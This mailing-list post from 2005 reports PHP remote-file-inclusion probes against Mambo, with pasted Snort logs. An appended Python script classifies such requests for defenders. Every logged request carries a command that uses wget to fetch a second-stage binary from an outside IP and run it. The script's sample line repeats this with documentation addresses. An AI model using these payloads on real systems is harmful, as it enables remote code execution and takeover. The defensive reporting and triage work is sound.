[Dshield] PHP injection attacks

tfischer@oldenburggroup.com tfischer at oldenburggroup.com
Thu Dec 22 03:25:35 GMT 2005


   I have started to see exploit attempts against my VPN. I believe I have
identified them as:
 FrSIRT advisory 12/15/05 - ADV-2005-2932, CVE-2005-4317, CVE-2005-4318,
CVE-2005-4319, CVE-2005-4320
   I called my VPN vendor to see if they were susceptible to this type of
attack. They said that as long as I had the latest patches I should be fine.
I asked them why the device does not log the attempts. They said they didn't
know, but there was no need to worry as long as the patches were in. The
attacks are only being directed at this box. They come in sets of 5 or 6.
There was one set Monday night, 6 yesterday and 50 so far today. Does anyone
know if this pattern has been automated and I'm just seeing some bots out
there searching? Anyone else seeing this?
   Here are some of the SNORT logs:

GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1
Host: my.ip.address
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)

GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1
Host: my.ip.address
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)

GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1
Host: my.ip.address
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)

GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1
Host: my.ip.address
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)

GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%2066.235.205.212/sexy;chmod%20744%20sexy;./sexy%20200.60.149.19%208080;00;echo%20YYY;echo|  HTTP/1.1
Host: my.ip.address
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)

GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%2066.235.205.212/sexy;chmod%20744%20sexy;./sexy%20200.60.149.19%208080;00;echo%20YYY;echo|  HTTP/1.1
Host: my.ip.address
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)

GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%2066.235.205.212/sexy;chmod%20744%20sexy;./sexy%20200.60.149.19%208080;00;echo%20YYY;echo|  HTTP/1.1
Host: my.ip.address
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)

GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%2066.235.205.212/sexy;chmod%20744%20sexy;./sexy%20200.60.149.19%208080;00;echo%20YYY;echo|  HTTP/1.1
Host: my.ip.address
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
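
Editor's note: the requests above follow one pattern (a Mambo/Joomla index2.php target, register_globals-style _REQUEST[...]/GLOBALS keys, a remote URL in mosConfig_absolute_path, and a cmd= value that downloads and runs a second stage). The Python below is an added example, not part of the original post, that pulls those indicators out of request lines so a defender can triage a burst of them rather than read each URL by hand. The sample lines are constructed to match the shape of the logs above, with RFC 5737 documentation addresses in place of the hosts the poster saw.

```python
import re
from urllib.parse import unquote

# Constructed sample lines shaped like the Snort request logs in the post above.
# Hosts are RFC 5737 documentation addresses, not the ones the poster saw.
SAMPLE_REQUESTS = [
    "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1"
    "&GLOBALS=&mosConfig_absolute_path=http://203.0.113.10/cmd.gif?"
    "&cmd=cd%20/tmp;wget%20198.51.100.7/listen;chmod%20744%20listen;"
    "./listen;echo%20YYY;echo|  HTTP/1.1",
    "GET /index.php?option=com_content&do_pdf=1&id=1 HTTP/1.1",
    "GET /cvs/index2.php?mosConfig_absolute_path=/var/www/mambo HTTP/1.1",
]
REQUEST_LINE = re.compile(r"^[A-Z]+\s+(\S+)\s+HTTP/\d\.\d$")
FETCHERS = ("wget", "curl", "fetch", "lynx")

def parse_query(target):
    """Path plus decoded (key, value) pairs. Splits on '&' only, so the
    ';'-separated shell commands inside cmd= stay in one value."""
    path, _, query = target.partition("?")
    pairs = [chunk.partition("=") for chunk in query.split("&") if chunk]
    return path, [(unquote(k), unquote(v)) for k, _, v in pairs]

def classify(line):
    """Indicators and a verdict for one request line; None if it is not one."""
    m = REQUEST_LINE.match(line.strip())
    if m is None:
        return None
    path, pairs = parse_query(m.group(1))
    params = dict(pairs)
    include = params.get("mosConfig_absolute_path", "")
    remote = include.lower().startswith(("http://", "https://", "ftp://"))
    # Keys that try to overwrite server-side state through register_globals.
    overrides = [k for k in params if k == "GLOBALS" or k.startswith("_REQUEST[")]
    commands = [c.strip() for c in params.get("cmd", "").split(";") if c.strip()]
    # Second-stage payload locations: the argument to any download utility.
    downloads = [c.split()[1] for c in commands
                 if len(c.split()) > 1 and c.split()[0] in FETCHERS]
    if remote and commands:
        verdict = "rfi_command_injection"
    elif remote:
        verdict = "rfi"
    elif include or overrides:
        verdict = "config_override"
    else:
        verdict = "benign"
    return {"path": path, "include": include, "overrides": overrides,
            "commands": commands, "downloads": downloads, "verdict": verdict}
```

Feeding the "downloads" values into a blocklist or a proxy log search is the quickest way to confirm whether any host on the network actually fetched the second stage, which is what matters far more than the number of probes.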
